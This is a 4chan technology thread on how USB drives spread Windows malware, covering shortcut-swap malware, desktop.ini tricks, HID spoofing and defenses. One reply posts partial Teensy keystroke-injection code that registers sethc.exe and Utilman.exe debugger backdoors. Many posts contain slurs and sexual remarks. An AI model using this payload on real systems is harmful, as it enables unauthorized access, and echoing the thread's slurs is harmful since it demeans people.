Malware

>>60142891
Them's child rearin' hips yew faggot. Learn to women.

That's one hell of a body.

>>60142863
How can you seriously like a shitty anime thats like 30 years old when we write two thousand seventeen. Its getting beyond stale. Can we outlaw manchildren somehow? The future of the white race depends on it.

>>60142863
Loading icons for DLL files in Explorer required loading them and executing Init function. It was fixed since I do not know when.

>>60142976
>Loading icons for DLL files in Explorer required loading them and executing Init function
So part of the malware needs to be DLL file?
And does that mean to excute the malware you'd need to open the drive?
Wouldn't using another file explorer solve that?

>>60143013
Yes.
Yes.
Most likely not because icon loading is ofenly borrowed from Win32. Read last sentence of my previous post.

>>60142958
You need to go back

Also, you can fix this manually by disabling all DLL custom icons.
HKCR/dllfile/DefaultIcon should not contain % signs.

>>60142863
>How do malware infect windows machine through USB flash drive if you disable autorun?
Most people don't disable autorun. When you make malware, you're normally not making it to infect the 1% to 5% of the people who take proactive steps to be secure. You're targeting the 99% to 95% of people who don't.
The exception to this is if you're the CIA or some shit and targeting specific individuals or foreign government systems.

>>60143039
I've read that, but I still find some infected USB flash drives.
Maybe they don't update then?
>>60143067
Nice.
>>60143084
>Most people don't disable autorun
That's true for XP/Vista/Win7, but from Win 8 it should be disabled by default.

>>60142958
You clearly don't belong here.

>>60142863
Someone out there came on this belly.
Literally how can I continue with my life, knowing this?

>>60142863
cute boy~

>>60143046
>>60143145
And I'd like to add to my previous post, that if you are so pathetic as to like Neon Genesis Evangelion in Anno Domini 2000 and fucking 17, then liking any of those positively retarded girls - Asuka or the blue headed one - is barely better than being a literal horsefucker. The only one which is *maybe* acceptable for a well-adjusted adult is that purple haired milf.

>>60142863
The usb stick can pretend to be whatever device, or even multiple ones at the same time. Like a keyboard and mouse that automatically do a sequence of key presses and mouse clicks when plugged in.

>>60143104
>Maybe they don't update then?
This and autorun and

that fucking malware which replaces folders with executables with same names and hides folders (with hidden attribute). After flash drive goes through one XP machine with nothing secure, it's enough to click any of those, even on 7 probably.

>>60143297
This.

>>60142863
Hand over the sauce now

>>60143297
That's assuming the USB flash drive spoof HID ID, which is on firmware level.
And in that case OS doesn't really matter at this point, unless you use OS that doesn't support USB HID.

If this is a girl then I'd fuck the shit out of her. If this is a boy then I'd fuck the shit out of him

>>60143300
>malware which replaces folders with executables with same names and hides folders
That clever, since many people don't enable "Show extension for known file types".
So if a machine that have autorun disabled, and you've noticed the swap and didn't run the malware you'd be safe?
I also assume the original folders won't be simply hidden, it might even be system attribute added to it.

>>60143171
wtf i am a faggot now

>>60143614
>So if a machine that have autorun disabled, and you've noticed the swap and didn't run the malware you'd be safe?
Windows is a shitload of legacy code. You are never safe until proven so.
There was no indication of DLL icon vulnerability since almost all DLLs had same icons built in and nobody thought that windows could be calling DLL to get icon.
>I also assume the original folders won't be simply hidden,
Properties->Hidden

>>60142863
Give me the salsa m80

>>60143300
THIS.
I have old XP machine that I use it to control a waterjet cutter.
Many customers come in with USB flash drive infected with various malwares.
However I discovered that windows might have a new way to set the hidden attribute.
Since the folder icon was changed to that of a volume, and can't be unhidden.
I had to delete it.

>>60142863
It doesnt.

>>60143252
>Liking biological females is almost as bad as wanting to fuck a horse
Here's your (you).

>>60144041
>Completely retarded moetron which indeed started the retard-moe trend 10 years before it became a thing
>Even more retarded obnoxious tsunderetron which started the obnoxious baka-baka-baka tsundere trend 10 years before it became a thing
>Also 2d anime characters
>biological females

(((((((((((((((((((((((((((((((((((Thats bait)))))))))))))))))))))))))))))))

Don't post OP images that are more interesting than your topic

File: ncY0gkH.jpg (114KB, 960x720px) Image search: [Google]

114KB, 960x720px

>fapping to male asuka
faggots go fap to kawaru

>>60142863
p-please be a trap

>>60142958
Kys my man

>>60142863
Driver Hijack.

Autorun got replaced with redirects in early 2013.

>>60145871
>redirects in early 2013
Example?

>>60145898
>Infected PC creates shortcuts for all files, and makes a hidden folder with a blank filename that will store the original files and a executable file/Installer
>Shortcuts open the malware installer disguised as the device drivers and the original file
>90% of people never notice their USB is infected

>>60145964
I understood the first part but why device driver?

>>60146030
So the malware can be executed without having to deal with UAC.

>>60146050
I see, in that case the best way to protect yourself from that is to check file extensions and disable autorun?

>>60146077
Pretty much.
You should be able to rescue the USB and get rid of the malware easy anyway all you need are 2 commands.

Its common sense to always check what are you running.

File: tmp_4869-1489568328683-732896174.jpg (82KB, 494x698px) Image search: [Google]

82KB, 494x698px

>>60146077
The best way to save yourself is to
install gentoo
You wouldn't go to sleep with your head inside a guillotine, would you?

>>60146125
>2 commands
del and attrib ?

>>60142863
>run Linux
>never need to worry about this shit

>>60146542
Isn't linux susceptible to autorun virus? especially if you have WINE installed?

>>60146928
Many distros auto mount flash drives but don't autorun

>>60146959
What's the difference?

>>60146972
Mounting just means it's accessible to the root filesystem for reading and writing

>>60146999
So opening the mounted volume with explorer doesn't execute the malware even if you have WINE installed?

>>60147038
It might
Wine definitely introduces vulnerabilities

>>60142913
>what is potatoshop

>>60145898
>>60145964
If I remember correctly all the files are hidden in a system permission folder with filename that is alt+0160/NBSP character that is like space [ ] but actually not similar. It won't delete files because that would trigger UAC. Just hides it and infects every shit it can.
noobs are baited to click the dummy shortcuts.lnk files which will:
open the malware and infect the local pc
open the shortcut to the folder or file so it won't be suspisious
The problem is when people try to copy/download that shortcut which isn't the actual file.

The malware sometimes just points to a native system32 command that will parse a binary that is hidden in the flash drive OR some garbled text file that is encoded to some shit to avoid detection.

Easy fix is to make a file with alt+0160 and give it a system permission so the virus wouldn't be able to hide your files (like the autorun.inf folder hacky fix)

>>60147721
there's another one which utilizes desktop.ini
it would:
>read the icon
>that is actually a malware
>no user intervention/autorun required, infected the moment you plug it in
it's very rare virus though but really clever

>>60142863
cute belly

>>60147769
>desktop.ini
That's genius.
GNU/Linux utilize .ini files as well, does that makes it vulnerable?

>>60143943
Same malware prevents showing hidden files in Explorer.

>>60142863
Memes aside, is that a girl or a girl(female)?

File: a7f39a6a3cb3bc09fe4ab6aad1966867.gif (1MB, 360x360px) Image search: [Google]

1MB, 360x360px

>>60142863
>people in this thread say its a guy

[spoiler] it only makes me harder [/spoiler]

File: line_analysis.png (462KB, 500x667px) Image search: [Google]

462KB, 500x667px

>>60148291
Based on the hips and the accuracy of the photo, I would say this is a woman. Usually when the hips are gimped there's some level inaccuracy with the vertical lines. I've highlighted some key lines in gimp here to emphasize the correctness. The only concern here is a rather large, uniform white spot around the hip that could indicate error correction. It's still somewhat up in the air, but my vote is female.

>>60149494
>no penis

Dropped

>>60143524
Wow.

Could we stop USB HID software by presenting a prompt when a "keyboard" is plugged in? Like a captcha to prove you're real human bean, so that if it starts typing bullshit, the PC will know this nigga ain't a real keyboard.

>>60142958
You should go to the Facebook Linux Memes group. You'd get along great over there.

Again /g/ can't into the humans

It isn't that autorun is the most dangerous, but it is the easiest that retards can do to get files into a network. The user is going to run the malware they bring in. USB is a nice target since it avoids all email, firewall (read website filtering) and the false sense of security that it came from my machine at home.

inb4 you can do X. We are talking about users who can't common sense 2017

>>60143252
off yourself my dude

WHERES THE FUCKING SOURCE

>>60142958
I feel sorry for your mother.

File: hehe.jpg (29KB, 438x396px) Image search: [Google]

29KB, 438x396px

>>60142891
I'd ssh into her MySQL server if you know what I mean.

>>60147499
something not done to this image

>>60153898
you mean give her a hot SQL Injection?

File: faggots.jpg (59KB, 1920x1080px) Image search: [Google]

59KB, 1920x1080px

>this thread
Remember when you didn't have to assume every womanlike figure was some kind of trap or freak? I hate this timeline. I want to go back.

>>60142958
>>60143046
>>60143252
Back to Argentina with you

>>60142863
same way that your pic is a trap

Finally. I've been wondering how these shitty desktop.ini files were related to persistence. The flavour I've been dealing with uses bogus System Volume Information folders, too.

WHO IS OP'S SEMEN DEMON

File: 4e9.png (338KB, 600x417px) Image search: [Google]

338KB, 600x417px

>>60153416
>>60154195
>dont like my retard imaginary girlfriend
>written by infamous hack
Hideaki Anno
>GET OFF MY BOARD

>>/a/
>>/1990s/

File: 1456207346948.jpg (56KB, 720x501px) Image search: [Google]

56KB, 720x501px

>>60143297
This anon gets it. I use a teensy sometimes on physical pen tests because they're so cheap.

 
#define TEENSY3
#ifdef TEENSY2
    #include<usb_private.h>
#endif

#define REG_Sethc "cmd /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"\"  /f"
#define REG_Utilman "cmd /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Utilman.exe\" /v Debugger /t REG_SZ /d \"\"  /f"

void setup(){
  delay(3000);
  wait_for_drivers(2000);
 
  minimise_windows();
  delay(500);
  while(!cmd_admin(3,500))
  {
  reset_windows_desktop(2000);
  }
  Keyboard.println(REG_Sethc);
  delay(3000);
  Keyboard.println(REG_Utilman);
  delay(2000);
  Keyboard.println("exit");

}

void loop() {

}

void wait_for_drivers(int sleep)
{
bool CapsLockTrap = is_caps_on();
while(CapsLockTrap == is_caps_on())
{
Keyboard.set_key1(KEY_CAPS_LOCK);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
delay(sleep);
}

>>60142958
The fuck kind of argument is "like 30 years old"? Are you going to call Shakespeare a hack next?

>>60148278
Other than those.
The hidden files/folder doesn't appear when plugging the infected flash drive into Linux.

>>60143524
>OS that doesn't support USB HID
Like what?

>>60151033
>common sense 2017
What do you recommend?
Hot gluing every USB port isn't an option, and sometimes you need to lend USB flash drive to someone.

>>60154272
>desktop.ini files
I've opend on of these and there was only gibberish in there.
>System Volume Information folders
That and RECYCLE as well.

>>60142863
Source of this Asuka pls

>>60142958
HURR DURR Y U NO LIEK WAT I LIEK

>>60143252
are you seriously calling people pathetic, and in the same post casting your vote on who you'd fuck from an anime?

>>60142863
who is that
source please

File: symbian.jpg (23KB, 800x600px) Image search: [Google]

23KB, 800x600px

>>60156240
Symbian.

WHERE IS THE SAUCE?!

>>60147769
>desktop.ini
I thought that effect folder appearance when you open that folder.
Autorun.inf does the icon change thing.

>>60142863
Who is this woman

>>60158426
It's a dude

File: homer sabber.png (81KB, 600x600px) Image search: [Google]

81KB, 600x600px

>>60142863
Who is this Slime Slurper?

File: serveimage.png (55KB, 320x224px) Image search: [Google]

55KB, 320x224px

>>60142863
Searching the image didn't give me results, OP. I beg for your source. Also is this a girl (female) or a girl (male)?

>>60158436
Who is this dude?

>>60158436
it's not a dude for fucks sakes, it's a beatiful woman

>>60158766
It's ok if you think guys are beautiful.
There's nothing weird about that these days.

>>60142863
Teensy + shell code payload

>>60156257
Something like McAfee device control can lock down all the USBs. Have a process through IT if you really need to use a USB.

File: apparently-semen-smells-like-squid---seitokai-yakuindomo_o_3102617.jpg (307KB, 1920x1080px) Image search: [Google]

307KB, 1920x1080px

>>60159143
>"Good afternoon, IT guy, I have this USB flash drive can you see if it's safe?"
>*show generous amount of cleavage as a motivation*
>3 hours later, the USB flash drive is missing the IT room smells like squid

>>60159191
what can I say. I like putting USBs in my ass and rocketing them out so I can hear the "ting" as it hits the side toilet.

>>60159191
>"male semen"

>>60147769
https://guides.yoosecurity.com/permanently-remove-desktop-ini-trojan-virus-from-windows-7-vista-or-xp/

keeping this thread up until source is provided or his gender is confirmed male

>>60147499
>>>/lgbt/
The hips don't lie. That's a cute girl.

>>60161976
There's like 4 different threads on 4 different boards looking for sauce.

It's unsauceable

>>60161976
>post cute girl
>OMG PLS BE A GUYYYYY

What the fuck is wrong with you people

>>60162992
Welcome to 4chan.

>>60162507
>It's unsauceable
I don't care
Get your best men on it
I need this sauce, boss

>>60159595
Does any other kind exist?

>>60142976
>Loading icons for DLL files in Explorer required loading them and executing Init function
holy shit what? is this true?

>>60162992
confirmation of guy, so i can stop thinking about it

POST
MORE
ASUKA

File: original.jpg (152KB, 720x960px) Image search: [Google]

152KB, 720x960px

>>60164299
OK

>>60143145
Evangelion is for the weebs that want to pretend they are cult

>>60143943
DO NOT CONNECT AN FOREING USB TO YOUR CNC PC!!!!!!!!

Instead plug them to your design PC, which will usually have an antivirus and copy the file from there to your safe MACHINE_PC - DESING_PC ONLY USB

I'd fire any employeewhos responsible of me having to rebuild a system image for not using a machine assigned USB. Period.

File: Untitled.png (720KB, 500x667px) Image search: [Google]

720KB, 500x667px

>>60149494
You're putting too much work into it.
According to Error Level Analysis, the image is mostly undoctored, with the exception being that strawberry in the middle. The highlights around her hair indicate JPG compression.

>>60165473
thank god, she's a wonder of nature

>>60165473
MVP right here. Can't find sauce, but with this I can feel some closure

S A U C E
A U C E
U C E
C E
E

>>60143252
>expecting people to be well-adjusted on 4chan of all places

>>60155480
Shakespeare IS a hack

>>60168110
might as well, this place has been full of normalfags for years now

File: sad Gaben.jpg (26KB, 401x253px) Image search: [Google]

26KB, 401x253px

>>60142863
>ywn fuck her porcelain white pussy

>>60168169
Anon whyyy

NOOoooooooooooooooooooooooo

>>60156240
headless server with no local login prompt

>>60143297
what youre looking for is teensy usb, hak5 use teensy usb called rubber ducky, but bash bunny came out, and is an improvement to rubber ducky imo.

File: hanging.png (156KB, 295x357px) Image search: [Google]

156KB, 295x357px

>>60168169

>>60168169
It's probably brown.

File: 1493143611302.jpg (127KB, 600x1266px) Image search: [Google]

127KB, 600x1266px

>>60170494
I ktf senpai

>>60143252
You're right my man.
Misato is the best.

>>60142863
Fuck this shit man, she is unfindable. Spent way more time on this than any healthy person should.

Not Alexandra Gaier, not Lana Rain, not any number of dA/IG sloots. I thought I was a good internet detective but I have been defeated.

>>60170648
in fact it seems she's only ever been posted in 4chan and other chans. The earliest posts date back to January 2017

>100 replies
>still no source
/g/ is fucking dead

>>60142863
Put a fake pdf on the USB that's secretly malware. They click on it and bam. You could also use a rubber ducky.

>>60170685
I swear i've seen this image way before 2017

>>60170759
There's no sauce. This is all a dream.